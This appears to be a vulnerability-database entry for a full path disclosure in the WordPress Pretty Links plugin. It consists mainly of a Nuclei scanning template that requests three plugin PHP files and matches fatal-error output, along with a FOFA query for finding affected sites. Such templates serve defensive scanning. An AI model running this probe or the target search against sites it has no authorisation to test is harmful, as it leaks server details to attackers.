wp-pretty-links-fpd: WordPress Pretty Links - Full Path Disclosure

2026-01-08 WordPress Pretty Links PoC Public

Description

WordPress Pretty Links plugin is vulnerable to full path disclosure via direct access to plugin files.

PoC

id: wp-pretty-links-fpd

info:
  name: WordPress Pretty Links - Full Path Disclosure
  author: ritikchaddha
  severity: low
  description: |
    WordPress Pretty Links plugin is vulnerable to full path disclosure via direct access to plugin files.
  reference:
    - https://wordpress.org/plugins/pretty-link/
  metadata:
    verified: true
    max-request: 3
    vendor: developer
    product: pretty-link
    framework: wordpress
    fofa-query: body="/wp-content/plugins/pretty-link/"
  tags: wp,wordpress,wp-plugin,fpd,pretty-links,exposure,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/pretty-link/app/models/PrliLink.php"
      - "{{BaseURL}}/wp-content/plugins/pretty-link/app/controllers/PrliLinksController.php"
      - "{{BaseURL}}/wp-content/plugins/pretty-link/app/helpers/PrliUtils.php"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Fatal error"
          - "pretty-link"
          - "Uncaught Error:"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008205f7354fc9b034a6e60a0be4aaebd186cd1327d27fd3fc0a9ee5d317f5624b022047d1a994180f13a6081c3bde3e260f2798142ec99cb6c05a61f2bd82f3bba216:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities